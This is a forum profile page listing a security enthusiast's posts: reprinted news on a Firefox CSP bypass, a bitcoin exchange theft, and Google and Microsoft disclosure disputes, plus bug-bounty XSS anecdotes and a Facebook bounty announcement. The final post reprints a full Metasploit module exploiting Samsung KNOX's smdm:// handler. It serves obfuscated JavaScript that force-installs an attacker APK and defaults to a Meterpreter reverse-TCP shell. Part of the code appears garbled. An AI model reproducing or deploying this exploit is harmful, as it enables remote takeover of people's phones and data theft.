Jump to content


Active Members
  • Content Count

  • Joined

  • Last visited

  • Days Won


Everything posted by akkiliON

  1. A technique to evade Content Security Policy (CSP) leaves surfers using the latest version of Firefox vulnerable to cross-site scripting (XSS) exploits. Researcher Matheus Vrech uncovered a full-blown CSP bypass in the latest version of Mozilla’s open source web browser that relies on using an object tag attached to a data attribute that points to a JavaScript URL. The trick allows potentially malicious content to bypass the CSP directive that would normally prevent such objects from being loaded. Vrech developed proof-of-concept code that shows the trick working in the current version of Firefox (version 69). The Daily Swig was able to confirm that the exploit worked. The latest beta versions of Firefox are not vulnerable, as Vrech notes. Chrome, Safari, and Edge are unaffected. If left unaddressed, the bug could make it easier to execute certain XSS attacks that would otherwise be foiled by CSP. The Daily Swig has invited Mozilla to comment on Vrech’s find, which he is hoping will earn recognition under the software developer’s bug bounty program. The researcher told The Daily Swig about how he came across the vulnerability. “I was playing ctf [capture the flag] trying to bypass a CSP without object-src CSP rule and testing some payloads I found this non intended (by anyone) way,” he explained. “About the impact: everyone that was stuck in a bug bounty XSS due to CSP restrictions should have reported it by this time.” Content Security Policy is a technology set by websites and used by browsers that can block external resources and prevent XSS attacks. PortSwigger researcher Gareth Heyes discussed this and other aspect of browser security at OWASP’s flagship European event late last month. Sursa: https://portswigger.net/daily-swig/firefox-vulnerable-to-trivial-csp-bypass
  2. Salutare tuturor, A trecut ceva timp de când n-am mai postat ce am găsit pe aici. Am găsit un XSS reflected în https://pay.google.com. Din păcate, merge doar pe Internet Explorer 11 din cauză că browser-ul nu suportă CSP-ul. Partea bună, este că vulnerabilitatea pe care am găsit-o a fost validată. Cam atât pot spune în momentul de față. Numai bine.
  3. English | ISBN-13: 978-1466592612 | 532 pages | PDF | 23 MB In this book, web security expert Wu Hanqing reveals how hackers work and explains why companies of different scale require different security methodologies. With in-depth analysis of the reasons behind the choices, the book covers client script security, server applications security, and Internet company security operations. It also includes coverage of browser security, cross sites script attacks, click jacking, HTML5/PHP security, injection attacks, authentication, session management, access control, web frame security, DDOS, leaks, Internet transactions security, and the security development lifecycle. Link : Dropbox - Web Security: A WhiteHat Perspective
  4. Happy birthday @M2G !
  5. Un prieten de-al meu a gasit un SQL Injection si a primit duplicate. Am raportat si eu un XSS (Flash), dar degeaba. Am primit duplicate.
  6. Felicit?ri, ?i-au validat problema ?
  7. Even as Bitcoin is starting to shake things up in the US, all is not well in the cryptocurrency world. China-based Bitcoin exchange Bter was hacked on Valentine’s Day and $1.75 million worth of Bitcoin was stolen. The company hasn’t revealed much about the breach, except that 7,170 BTC was taken from its cold (offline) wallet on February 14 via a single transaction (link) and that the platform is suspending operations until further notice. The company has offered a bounty of 720 BTC – about $170,000 – for the retrieval of the stolen currency. It says it will arrange withdrawals of unaffected funds at a later date. This is the second major Bitcoin hack in the past two months. Slovenian exchange Bitstamp lost about $5 million worth of currency in January but has since resumed service. More positively, Coinbase launched the first US Bitcoin exchange last month, ahead of the launch of Lunar, a competitor backed by the Winklevoss twins. It’s likely that this year’s debate around Bitcoin will center more on security than whether businesses or individuals choose to adopt the currency. Bter blockchain.info Source: $1.75 Million in Bitcoin Stolen from Chinese Exchange Bter
  8. akkiliON

    Yahoo XSS

    Request-ul se f?cea prin POST Method.
  9. akkiliON

    Yahoo XSS

    Am zis c? n-are rost s? mai creez un alt topic. Vreau doar s? spun c? am g?sit un XSS Stored în portal.office.com (Microsoft), care se putea exploata. Am fost recompensat cu 1500$ + un loc in Hall of Fame. Vulnerabilitatea a fost fixat?.
  10. Microsoft has heavily criticized Google and its 90-days security disclosure policy after the firm publicly revealed two zero-day vulnerabilities in Microsoft’s Windows 8.1 operating system one after one just days before Microsoft planned to issue a patch to kill the bugs. But, seemingly Google don't give a damn thought. Once again, Google has publicly disclosed a new serious vulnerability in Windows 7 and Windows 8.1 before Microsoft has been able to produce a patch, leaving users of both the operating systems exposed to hackers until next month, when the company plans to deliver a fix. DISCLOSURE OF UNPATCHED BUGS, GOOD OR BAD? Google’s tight 90-days disclosure policy seems to be a good move for all software vendors to patch their products before they get exploited by the hackers and cybercriminals. But at the same time, disclosing all critical bugs along with its technical details in the widely used operating system like Windows 7 and 8 doesn’t appears to be a right decision either. In both cases, the only one to suffer is the innocent users. The revelation of the security flaw was also a part Google's Project Zero, an initiative that identifies security holes in different software and calls on companies to publicly disclose and patch bugs within 90 days of discovering them. This time the search engine giant has discovered a flaw in the CryptProtectMemory memory-encrypting function found within Windows 7 and 8.1 and presents in both 32- and 64-bit architectures, which can accidentally disclose sensitive information or allow a miscreant to bypass security checks, apparently. MICROSOFT WILL DELIVER PATCH IN FEB, 2015 Google first notified Microsoft of the vulnerability in Windows 7 and 8.1 on October 17, 2014. Microsoft then confirmed the security issues on October 29 and said that its developers managed to reproduce the security hole. The patch for the vulnerability is scheduled for Feb. 10, next Patch Tuesday. The vulnerability was found by James Forshaw, who also discovered a "privilege elevation flaw" in Windows 8.1, which was disclosed earlier this week and drew strong criticism from Microsoft. The newly discovered bug actually resides in the CNG.sys implementation, which failed to run proper token checks. This is third time in less than a month when the Google’s Project Zero released details of the vulnerability in Microsoft’s operating system, following its 90-day public disclosure deadline policy. Few days ago, Google released details of a new privilege escalation bug in Microsoft's Windows 8.1 operating system just two days before Microsoft planned to patch the bug. Google vs. Microsoft — Google reveals Third unpatched Zero-Day Vulnerability in Windows - Hacker News
  11. akkiliON

    Yahoo XSS

    Nu, înc? nici nu e fixat? problema.
  12. akkiliON

    Yahoo XSS

    Vulnerabilitate: Cross-site-scripting stored Autor: akkiliON Raportat? si validat?. Se poate exploata, nu e self. Dovad?:
  13. Download: 92.58 MB/s Upload: 92.66 MB/s ISP: RDS & RCS
  14. Shit happens. Take a look: https://hackerone.com/reports/12685
  15. Starting today and extending through the end of 2014, all Whitehat bugs in our ads code will receive double bounties. We recently completed a comprehensive security audit of this area ourselves. We found and fixed a number of security bugs but would like to encourage additional scrutiny from Whitehats to see what we might have missed. Also, since the vast majority of bug reports we work on with the Whitehat community are focused on the more common parts of Facebook code, we hope to encourage researchers to become more familiar with the surface area of ads to better protect the businesses that use them. Below are some tips for successfully finding bugs in ads code. Here is a sampling of past Whitehat bugs in ads that we've fixed: Redeeming the same ads coupon multiple times without expiry. Retrieving the name of an unpublished Page via the Ads Create Tool by guessing its Page ID. Arbitrary local file read via a .zip symlink (more details in this post) Injecting JavaScript into an ads report email and then leveraging a CSRF bug to make a victim send a malicious email to a target on your behalf. Ads can be organized into a few sections: UI - The UI is made up of our old and new Ads Manager tools (at /ads/manage/), as well as the JavaScript-based Power Editor tool that supports bulk ad edits and uploads. Most of the serious Whitehat bugs in this area have surfaced around permissions, viewing ads, or parts of an ad that is not yours. Ads API (https://developers.facebook.com/docs/ads-api) - The documentation for this frequently used API is a good introduction to the describe components of ads: a user ID, a campaign, an account, creative and so on. While not present in the ads API itself, the following writeup describes an excellent bug of the type that might be found in there: Hacking Facebook’s Legacy API, Part 1: Making Calls on Behalf of Any User. Analytics, also called insights - Analytics is what measures the performance of an ad, how well the ads are performing, and so on. Like with UI, the bugs we've seen in this area that had the largest impact have been missing or incorrect permissions checks. For example, we had an issue where someone could access insights for any application via a Graph API token with the read_insights permission. Everything else - There is a lot of backend code to correctly target, deliver, bill and measure ads. This code isn't directly reachable via the website, but of the small number of issues that have been found in these areas, they are relatively high impact. At this stage of our bug bounty program, it's uncommon for us to see many of the common web security bugs like XSS. What we see more often are things like missing or incorrect permissions checks, insufficient rate-limiting that can lead to scraping, edge-case CSRF issues, and problems with SWFs. Ads-related code is the main part of Facebook that has and enforces roles, so it's also worthwhile to understand them: https://www.facebook.com/help/289207354498410. Among these roles, the permissions for reading or writing billing information are the most relevant. The best way to report an issue is to use your Whitehat test account: https://www.facebook.com/whitehat/accounts/. Good luck, and keep the submissions coming! Surs?: https://www.facebook.com/notes/protect-the-graph/doubling-up-on-ads-code-bounties/1519314984975314
  16. A fost frumos challenge-ul. A?tept ?i urm?torul.
  17. A fost postat. https://rstforums.com/forum/92177-samsung-galaxy-knox-android-browser-remote-code-execution.rst
  18. Doar câteva minute au trecut de când am v?zut la TV. L.E: http://www.fbi.gov/wanted/cyber
  19. This Metasploit module exploits a vulnerability that exists in the KNOX security component of the Samsung Galaxy firmware that allows a remote webpage to install an APK with arbitrary permissions by abusing the 'smdm://' protocol handler registered by the KNOX component. The vulnerability has been confirmed in the Samsung Galaxy S4, S5, Note 3, and Ace 4. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'digest/md5' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::BrowserExploitServer # Hash that maps payload ID -> (0|1) if an HTTP request has # been made to download a payload of that ID attr_reader :served_payloads def initialize(info = {}) super(update_info(info, 'Name' => 'Samsung Galaxy KNOX Android Browser RCE', 'Description' => %q{ A vulnerability exists in the KNOX security component of the Samsung Galaxy firmware that allows a remote webpage to install an APK with arbitrary permissions by abusing the 'smdm://' protocol handler registered by the KNOX component. The vulnerability has been confirmed in the Samsung Galaxy S4, S5, Note 3, and Ace 4. }, 'License' => MSF_LICENSE, 'Author' => [ 'Andre Moulu', # discovery and advisory 'joev' # msf module ], 'References' => [ ['URL', 'http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html'], ['OSVDB', '114590'] ], 'Platform' => 'android', 'Arch' => ARCH_DALVIK, 'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' }, 'Targets' => [ [ 'Automatic', {} ] ], 'DisclosureDate' => 'Nov 12 2014', 'DefaultTarget' => 0, 'BrowserRequirements' => { :source => 'script', :os_name => OperatingSystems::Match::ANDROID } )) register_options([ OptString.new('APK_VERSION', [ false, "The update version to advertise to the client", "1337" ]) ], self.class) deregister_options('JsObfuscate') end def exploit @served_payloads[req.qstring['id']].to_s, 'Content-type' => 'text/plain') elsif req.uri =~ /launch$/ send_response_html(cli, launch_html) else super end end # The browser appears to be vulnerable, serve the exploit def on_request_exploit(cli, req, browser) print_status "Serving exploit..." send_response_html(cli, generate_html) end def magic_headers { 'Content-Length' => apk_bytes.length, 'ETag' => Digest::MD5.hexdigest(apk_bytes), 'x-amz-meta-apk-version' => datastore['APK_VERSION'] } end def generate_html %Q| <!doctype html> <html><body> <script> #{exploit_js} </script></body></html> | end def exploit_js payload_id = rand_word js_obfuscate %Q| function poll() { var xhr = new XMLHttpRequest(); xhr.open('GET', '_poll?id=#{payload_id}&d='+Math.random()*999999999999); xhr.onreadystatechange = function(){ if (xhr.readyState == 4) { if (xhr.responseText == '1') { setTimeout(killEnrollment, 100); } else { setTimeout(poll, 1000); setTimeout(enroll, 0); setTimeout(enroll, 500); } } }; xhr.onerror = function(){ setTimeout(poll, 1000); setTimeout(enroll, 0); }; xhr.send(); } function enroll() { var loc = window.location.href.replace(/[/.]$/g, ''); top.location = 'smdm://#{rand_word}?update_url='+ encodeURIComponent(loc)+'/#{payload_id}.apk'; } function killEnrollment() { top.location = "intent://#{rand_word}?program="+ "#{rand_word}/#Intent;scheme=smdm;launchFlags=268468256;end"; setTimeout(launchApp, 300); } function launchApp() { top.location='intent:view#Intent;SEL;component=com.metasploit.stage/.MainActivity;end'; } enroll(); setTimeout(poll,600); | end def rand_word Rex::Text.rand_text_alphanumeric(3+rand(12)) end end Source: Samsung Galaxy KNOX Android Browser Remote Code Execution ? Packet Storm
  • Create New...